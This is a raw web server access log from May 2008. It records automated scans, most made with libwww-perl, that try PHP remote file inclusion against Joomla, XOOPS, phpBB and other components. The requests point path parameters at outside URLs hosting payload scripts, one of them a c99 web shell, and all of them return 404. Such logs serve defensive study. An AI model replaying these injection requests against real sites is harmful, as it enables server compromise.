204.10.69.106 - - [18/May/2008:17:01:14 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:17:01:15 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
219.119.139.78 - - [18/May/2008:17:01:54 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:06:21 -0700] "GET /config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
78.108.155.178 - - [18/May/2008:17:07:03 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
78.108.155.178 - - [18/May/2008:17:07:04 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
78.108.155.178 - - [18/May/2008:17:07:04 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.123.140.170 - - [18/May/2008:17:09:00 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.123.140.170 - - [18/May/2008:17:09:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.123.140.170 - - [18/May/2008:17:09:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:17:10:24 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
74.6.22.189 - - [18/May/2008:17:10:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
74.6.8.25 - - [18/May/2008:17:10:53 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
83.19.144.26 - - [18/May/2008:17:11:34 -0700] "GET /principal.php?conteudo=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
83.19.144.26 - - [18/May/2008:17:11:39 -0700] "GET /logs/principal.php?conteudo=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
83.19.144.26 - - [18/May/2008:17:11:51 -0700] "GET /logs/access.log/principal.php?conteudo=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
219.119.139.78 - - [18/May/2008:17:13:37 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
219.119.139.78 - - [18/May/2008:17:13:37 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
219.119.139.78 - - [18/May/2008:17:13:37 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:17:18:25 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:23:12 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:23:12 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:23:13 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:23:13 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "neighborhoodglimpses.com"
88.27.252.89 - - [18/May/2008:17:24:52 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
88.27.252.89 - - [18/May/2008:17:24:53 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
88.27.252.89 - - [18/May/2008:17:24:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:25:00 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:25:01 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:25:01 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
72.36.154.122 - - [18/May/2008:17:25:01 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
88.27.252.89 - - [18/May/2008:17:26:07 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:26:13 -0700] "GET /logs/access.log/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:26:14 -0700] "GET /ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:26:16 -0700] "GET /logs/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:26:45 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:26:45 -0700] "GET /logs/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:28:42 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:28:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:28:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:17:29:08 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:17:29:17 -0700] "GET /logs/access_080414.log//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:30:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
74.55.112.34 - - [18/May/2008:17:31:12 -0700] "GET /main.php?x=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:32:03 -0700] "GET /logs/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:32:03 -0700] "GET /ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:32:17 -0700] "GET /logs/access_080211.log/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:32:18 -0700] "GET /ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:32:18 -0700] "GET /logs/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:17:33:25 -0700] "GET /logs/access_080225.log/index.php?pageurl=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:36:09 -0700] "GET /logs/password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.187.25.20 - - [18/May/2008:17:36:10 -0700] "GET /password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
208.97.181.220 - - [18/May/2008:17:36:14 -0700] "GET /config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:17:40:06 -0700] "GET /config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:17:44:35 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:17:44:35 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:17:44:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:17:45:24 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:47:54 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:47:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:47:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:48:01 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:48:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:17:48:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
208.109.249.64 - - [18/May/2008:17:50:22 -0700] "GET /common/db.php?commonpath=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
208.109.249.64 - - [18/May/2008:17:50:22 -0700] "GET /logs/common/db.php?commonpath=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
208.109.249.64 - - [18/May/2008:17:50:22 -0700] "GET /common/db.php?commonpath=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.neighborhoodglimpses.com"
208.109.249.64 - - [18/May/2008:17:50:22 -0700] "GET /logs/common/db.php?commonpath=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:51:16 -0700] "GET /logs/access_080211.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:51:17 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:51:17 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:17:53:53 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:17:53:53 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
208.97.181.220 - - [18/May/2008:17:54:35 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
208.97.181.220 - - [18/May/2008:17:54:35 -0700] "GET /logs/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:54:56 -0700] "GET /logs/access_080211.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:54:57 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:54:57 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
201.8.28.186 - - [18/May/2008:17:55:05 -0700] "GET /logs/access_071217.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:17:55:14 -0700] "GET /config.php?path_to_root=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:55:19 -0700] "GET /logs/access.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:55:20 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:55:20 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:56:36 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:17:56:37 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
207.58.166.231 - - [18/May/2008:17:58:21 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
207.58.166.231 - - [18/May/2008:17:58:21 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
207.58.166.231 - - [18/May/2008:17:58:22 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
65.55.232.23 - - [18/May/2008:17:59:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.232.23 - - [18/May/2008:17:59:44 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:01:19 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:01:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:01:20 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:18:01:52 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
82.146.59.231 - - [18/May/2008:18:01:52 -0700] "GET /logs/config.php?path_to_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
75.125.151.18 - - [18/May/2008:18:01:55 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
75.125.151.18 - - [18/May/2008:18:01:55 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
75.125.151.18 - - [18/May/2008:18:01:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:02:08 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:02:08 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:02:41 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:02:42 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:02:42 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:03:42 -0700] "GET /logs/access.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:03:42 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:03:43 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:03:54 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:03:55 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:04:33 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:04:33 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:04:34 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:07:43 -0700] "GET /logs/access_080211.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:07:44 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:18:07:44 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:07:44 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:18:07:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
